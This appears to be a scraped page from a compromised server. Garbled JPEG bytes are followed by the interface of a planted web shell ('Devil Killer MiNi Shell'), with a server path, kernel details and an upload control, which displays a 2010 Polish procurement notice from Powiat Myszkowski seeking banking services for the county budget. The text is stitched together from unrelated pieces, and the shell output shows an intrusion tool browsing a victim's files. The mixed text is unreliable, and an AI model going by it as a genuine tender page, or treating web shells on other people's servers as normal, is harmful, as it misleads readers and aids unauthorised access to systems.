JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100519/136722-N-2010.html

<p class="kh_header"><b>Myszków: WYKONYWANIE BANKOWEJ OBSŁUGI BUDŻETU POWIATU MYSZKOWSKIEGO, STAROSTWA POWIATOWEGO W MYSZKOWIE, POWIATOWYCH JEDNOSTEK ORGANIZACYJNYCH, INSPEKCJI I STRAŻY.</b><br>
<b>Numer ogłoszenia: 136722 - 2010; data zamieszczenia: 19.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Myszkowski reprezentowany przez Zarząd Powiatu w Myszkowie , ul. Pułaskiego 6, 42-300 Myszków, woj. śląskie, tel. 034 3159100, faks 034 3159160.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatmyszkowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONYWANIE BANKOWEJ OBSŁUGI BUDŻETU POWIATU MYSZKOWSKIEGO, STAROSTWA POWIATOWEGO W MYSZKOWIE, POWIATOWYCH JEDNOSTEK ORGANIZACYJNYCH, INSPEKCJI I STRAŻY..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie  bankowej obsługi budżetu Powiatu Myszkowskiego, Starostwa Powiatowego w Myszkowie, powiatowych jednostek organizacyjnych, inspekcji i  straży.
Wykaz jednostek organizacyjnych Powiatu  Myszkowskiego:
1.Powiatowy Urząd Pracy w Myszkowie
2.Powiatowy Zarząd Dróg w Myszkowie
3.Powiatowy Inspektorat Nadzoru Budowlanego w Myszkowie
4.Komenda Powiatowa Państwowej Straży Pożarnej w Myszkowie
5.Powiatowe Centrum Pomocy Rodzinie w Myszkowie
6.Rodzinny Dom Dziecka w Myszkowie
7.Publiczna Poradnia Psychologiczno-Pedagogiczna w Myszkowie
8.Zespół Obsługi Ekonomiczno-Administracyjnej Szkół i Placówek Oświatowo-         Wychowawczych w Myszkowie
9.Liceum Ogólnokształcące im. mjr H. Sucharskiego w Myszkowie
10.Zespół Szkół  Nr 1  im. E. Kwiatkowskiego w Myszkowie
11.Zespół Szkół  Nr 2  im. H. Kołłątaja w Myszkowie
12.Zespół Szkół  im. T. Kościuszki w Żarkach
Określenie przedmiotu zamówienia:
1.Wykonywanie w okresie  36 miesięcy od daty zawarcia umowy  bankowej obsługi budżetu Powiatu Myszkowskiego, Starostwa Powiatowego w Myszkowie, powiatowych jednostek organizacyjnych, inspekcji i  straży, polegającej na:
1)Otwarciu i prowadzeniu oprocentowanych rachunków  bieżących (14 szt.) i oprocentowanych  rachunków pomocniczych (49 szt.), obejmujących budżet Powiatu,  Starostwa Powiatowego, powiatowych jednostek organizacyjnych, inspekcji i straży
Uwaga:
a)powyższe dane są wielkościami szacunkowymi,
b)w przypadku konieczności otwarcia przez Zamawiającego dodatkowych rachunków, bank zastosuje stawki z niniejszego przetargu.
2)Wydawaniu książeczek czekowych.
3)Realizacji czeków. 
4)Przyjmowaniu wpłat gotówkowych.
5)Dokonywaniu wypłat gotówkowych.
6)Realizacji poleceń przelewów (elektronicznych i papierowych) w systemie bankowości elektronicznej, która będzie miała miejsce w poniższych przypadkach  i zasadach  :
a) w sytuacjach losowych ( np. awaria systemu) umożliwienie realizacji poleceń przelewów w formie papierowej,
b) przelewy zarówno w formie papierowej jak i elektronicznej winny być dokonywane w tym samym dniu umożliwiając realizację danych płatności ,
c) uznawanie rachunków winno odbywać się w dniu operacji,
d) za zainstalowanie oraz korzystanie z systemu bankowości elektronicznej bank nie będzie pobierał jakichkolwiek opłat i prowizji,
e) elektroniczny system bankowy będzie zainstalowany na 7 stanowiskach. 
7)Udzielaniu Powiatowi na jego wniosek kredytu w rachunku bieżącym w terminie do 14 dni od daty dostarczenia wniosku - do wysokości określonej corocznie przez Radę Powiatu w uchwale budżetowej.
Uwaga: dla zabezpieczenia kredytu Zamawiający nie może udzielić pełnomocnictwa do dysponowania rachunkiem bankowym.
8)Prowadzeniu rachunków bankowych  dla budżetu Powiatu, Starostwa Powiatowego, powiatowych jednostek organizacyjnych, inspekcji i straży na jednakowych warunkach.
9)Nieodpłatnym wydawaniu opinii bankowej o prowadzonym rachunku bankowym oraz innych opinii  i zaświadczeń.
10)Wydawaniu promesy kredytowej na wniosek Powiatu w terminie do 14 dni od dnia dostarczenia informacji koniecznych do wydania takiego dokumentu.
11)Generowaniu przez bank dla potrzeb służb finansowo - księgowych wyciągu do rachunku bankowego każdego dnia, najpóźniej  do  godziny 10:00.
12)Zapewnieniu bezpłatnej pomocy technicznej w okresie wdrożeniowym i powdrożeniowym  pracownikom Starostwa Powiatowego, powiatowych jednostek organizacyjnych, inspekcji i straży  pracujących w systemie bankowości elektronicznej.
2.Wykonawca winien zapewnić obsługę Zamawiającego, w co najmniej jednej placówce (filii, oddziale, punkcie kasowym) na terenie miasta Myszkowa. Wykonawca zobowiązany jest dołączyć do oferty oświadczenie o posiadaniu bądź gotowości utworzenia oddziału, filii lub punktu kasowego (zgodnie z załącznikiem Nr 6 do SIWZ). W przypadku:
a)nie posiadania bądź nie zadeklarowania chęci utworzenia przez Wykonawcę oddziału, filii lub punktu kasowego oferta zostanie odrzucona,
b)nie otwarcia przez Bank w terminie 2 miesięcy od daty podpisania umowy oddziału, filii na terenie miasta Myszkowa lub punktu kasowego w Starostwie Powiatowym w Myszkowie lub  likwidacji oddziału, filii, punktu kasowego w trakcie trwania umowy Zamawiający rozwiąże umowę w trybie natychmiastowym, bez konieczności wcześniejszego wypowiedzenia.
3.Zamawiający nie dopuszcza pobierania żadnych opłat i prowizji od  uruchomienia  i obsługi kredytu, w tym również od salda  niewykorzystanej części kredytu  w rachunku bieżącym.
4.Posiadacz rachunku składa dyspozycje rozliczeniowe w godzinach od 800 do 1600. 
5.Odsetki od środków zgromadzonych na rachunkach bankowych podlegają kapitalizacji na koniec miesiąca.
6.Prowizje, opłaty i marża Banku są stałe w okresie obowiązywania umowy.
7.O zmianie   oprocentowania środków na rachunkach bieżących i pomocniczych pomniejszone o stałą marżę banku i oprocentowania  kredytu w rachunku bieżącym powiększone o stałą marżę Banku, Zarząd Powiatu zostanie powiadomiony pisemnie. Zmiany te nie wymagają aneksu do umowy
8.Wolne środki finansowe Zarząd Powiatu może gromadzić na  lokatach terminowych według odrębnej wynegocjowanej  umowy.
9.Zapłata za wykonane usługi bankowe nastąpi na podstawie wystawionej faktury VAT na koniec każdego miesiąca w terminie 14 dni od daty wpływu .
10.Wysokość oprocentowania środków pieniężnych na rachunkach bieżących i pomocniczych (jedna stopa dla wszystkich rachunków) wynosi stawkę WIBID 1M wyliczoną jako średnia z 10 ostatnich notowań poprzedzających okres obrachunkowy ( 1 miesiąc kalendarzowy ) pomniejszona o stałą marżę Banku. W dniu zawarcia umowy  oprocentowanie wynosi ....... w stosunku rocznym, w tym  stała marża Banku  wynosi........   Zmiana oprocentowania następuje w okresach miesięcznych. Marża Banku w okresie obowiązywania umowy jest stała.
11.Wysokość oprocentowania kredytu w rachunku bieżącym wynosi  stawkę WIBOR 1M wyliczoną jako średnia z 10 ostatnich notowań poprzedzających okres obrachunkowy ( 1 miesiąc kalendarzowy ) powiększona o stałą marżę Banku. W dniu zawarcia umowy  oprocentowanie wynosi ........ w stosunku rocznym, w tym  stała marża Banku  wynosi......... Zmiana oprocentowania następuje w okresach miesięcznych. Marża Banku w okresie obowiązywania umowy jest stała.
12.Informacja  o wielkościach budżetu  Powiatu Myszkowskiego na rok 2010.
Plan dochodów  	73.156.747 zł
Plan wydatków	80.391.747 zł
Plan przychodów	  8.795.000 zł
Plan rozchodów	  1.560.000 zł
13.Do prowadzenia  obsługi kasowej Starostwa Powiatowego oraz działalności bankowej Zamawiający udostępni odpłatnie Bankowi lokal nr 11 o pow. 19,30 m2 , usytuowany na parterze budynku Starostwa Powiatowego w Myszkowie przy  ul. Pułaskiego 6 ( inny niż dotychczas istniejący ).
14.Umowa najmu lokalu w celu prowadzenia obsługi kasowej Starostwa  Powiatowego  w Myszkowie będzie zawarta na czas określony tzn. na czas obowiązywania  umów  o wykonywanie bankowej obsługi budżetu Powiatu Myszkowskiego, Starostwa Powiatowego w Myszkowie, powiatowych jednostek organizacyjnych , inspekcji  i straży, tj. na okres  do 36 miesięcy.
15.Wysokość miesięcznego czynszu za pomieszczenie przeznaczone na prowadzenie obsługi kasowej Starostwa  Powiatowego na dzień podpisania umowy wyniesie 397,58 zł ( 19,30 m2 x 20,60 zł ) + VAT. Czynsz  podlegać będzie  kwartalnej waloryzacji o wskaźnik wzrostu cen towarów i usług konsumpcyjnych ogłaszanych przez Prezesa GUS w Monitorze Polskim, począwszy od 1 dnia miesiąca następującego  po miesiącu ogłoszenia wskaźnika. 
16.Oprócz czynszu Najemca uiszczać będzie miesięczne  opłaty za media w wysokości:
1) za energię elektryczną w wysokości 140,00 zł +  VAT 
2) za centralne ogrzewanie 4,00 zł +VAT za 1m2  powierzchni
17.Wysokość opłat za energię elektryczną i energię cieplną będzie ulegała zmianie  o wskaźnik wzrostu cen dostawców energii .
18.Odpłatność miesięczna na dzień podpisania umowy za najem lokalu o powierzchni 19,30 m2 wyniesie 614,78 zł + VAT, w tym: stawka czynszu  397,58 zł + VAT, opłata za energię elektryczną  140,00 zł + VAT, opłata za centralne ogrzewanie 77,20 zł + VAT.
19.Zmiana wysokości czynszu oraz opłat nie stanowi zmiany umowy i nie wymaga  podpisania aneksu. O zmianie wysokości czynszu i opłat   Zamawiający powiadomi pisemnie Bank w terminie 7 dni od daty opublikowania odpowiednio wskaźnika wzrostu cen towarów i usług oraz otrzymania informacji o wzroście  cen dostawców energii.
20.Czynsz i opłaty  będą uiszczane z góry w terminie do dnia 10 każdego miesiąca na podstawie otrzymanej faktury.  
21.Nakłady poniesione przez Bank na adaptację pomieszczenia nie podlegają zwrotowi     i rozliczeniu.
22.Bank ma prawo nieodpłatnie umieścić tablice informacyjne na zewnątrz i wewnątrz budynku po uprzednim uzgodnieniu z Zamawiającym.
23.Bankowi nie wolno oddawać przedmiotu najmu w podnajem ani bezpłatne używanie osobom trzecim.
24.Umowa najmu lokalu  może zostać rozwiązana przez Zamawiającego ze skutkiem natychmiastowym w przypadku używania przedmiotu najmu niezgodnie   z przeznaczeniem, w przypadku rozwiązania  umów o wykonywanie bankowej obsługi budżetu Powiatu Myszkowskiego, Starostwa Powiatowego w Myszkowie, powiatowych jednostek organizacyjnych, inspekcji i straży oraz w przypadku zwłoki z zapłatą czynszu lub opłat za media za co najmniej dwa pełne okresy płatności oraz naruszenia pkt.22 i 23. 
25.W przypadku zwłoki z zapłatą czynszu lub opłat za media Bank wyraża zgodę na potrącenie tych  należności  wraz z odsetkami   z  wystawianych przez Bank faktur VAT za wykonane usługi bankowe.
26.Koszty związane z  zawarciem umowy najmu ponosi Bank.
27.W przypadku złożenia  oferty zawierającej opłatę jednorazową za otwarcie rachunków bankowych- opłata ta będzie  płatna  w trzech równych rocznych ratach  w okresie 36 miesięcy od daty zawarcia umowy bankowej.
28.Dopuszcza się zmiany postanowień umowy w stosunku do treści umowy na zasadach określonych w art.144 ust.1 ustawy Prawo zamówień publicznych.
Zamawiający dopuszcza zmiany postanowień umowy oraz określa warunki zmian.
Zmiany dotyczyć mogą zakresu usług stanowiących przedmiot umowy, jeżeli wynikają  z następujących okoliczności:
a)podyktowane zostaną zmianami przepisów prawa, wprowadzonymi po podpisaniu niniejszej umowy,
b)na Powiat Myszkowski zostaną nałożone nowe zadania lub zmieni się struktura organizacyjna Powiatu Myszkowskiego,
c)pojawią się nowe korzystne dla Powiatu Myszkowskiego produkty bankowe lub rozwiązania organizacyjne, których wykorzystanie będzie korzystne dla Powiatu Myszkowskiego,
d)wprowadzona zostanie modyfikacja systemów informatycznych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przedmiotowym postępowaniu Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunków spełnienia udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunków spełnienia udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunków spełnienia udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunków spełnienia udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunków spełnienia udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5) szczegółowo określone w Specyfikacji Istotnych Warunków Zamówienia dostępnej na stronie Zamawiającego http://www.powiatmyszkowski.pl
Jeżeli wykonawcy wspólnie ubiegają się o zamówienie (konsorcjum) mają obowiązek złożyć każdy z osobna dokumenty wymienione w Rozdziale VII ppkt 1.1, ppkt 2.1,     ppkt 2.3, ppkt 2.4, ppkt 2.5 ppkt 2.6, ppkt 2.7   SIWZ. 
Do ofert należy dołączyć:
a)Pełnomocnictwo ustanawiające pełnomocnika do reprezentowania ich  w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu  i zawarcia umowy w sprawie zamówienia publicznego.
W przypadku wyboru przez zamawiającego oferty złożonej przez konsorcjum, wykonawcy tworzący konsorcjum zobowiązani będą najpóźniej przed zawarciem umowy w sprawie zamówienia publicznego, do przedłożenia umowy konsorcjum.
Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem konsorcjum.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w Rozdziale VII ppkt 2.3. ppkt 2.4, ppkt 2.5, ppkt 2.6 i ppkt 2.7 SIWZ składa dokumenty o których mowa w § 4 Rozporządzenia Prezesa Rady Ministrów    z dnia 30 grudnia 2009 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane. ( Dz. U. Nr 226, poz. 1817)
W/w dokumenty  należy złożyć w formie oryginału lub kopii poświadczonej za zgodność  z oryginałem przez wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu w przypadku, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna  lub budzi wątpliwości co do jej prawdziwości. 
Wykonawca winien zapewnić obsługę Zamawiającego, w co najmniej jednej placówce (filii, oddziale, punkcie kasowym) na terenie miasta Myszkowa. Wykonawca zobowiązany jest dołączyć do oferty oświadczenie o posiadaniu bądź gotowości utworzenia oddziału, filii lub punktu kasowego (zgodnie z załącznikiem Nr 6 do SIWZ).
W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawca musi załączyć do oferty następujące oświadczenie oraz dokumenty: 
oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 2
 do SIWZ)   
 W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawca musi załączyć do oferty następujące dokumenty i oświadczenia: oświadczenie  o braku podstaw do wykluczenia z postępowania   (załącznik nr 3 do SIWZ) 
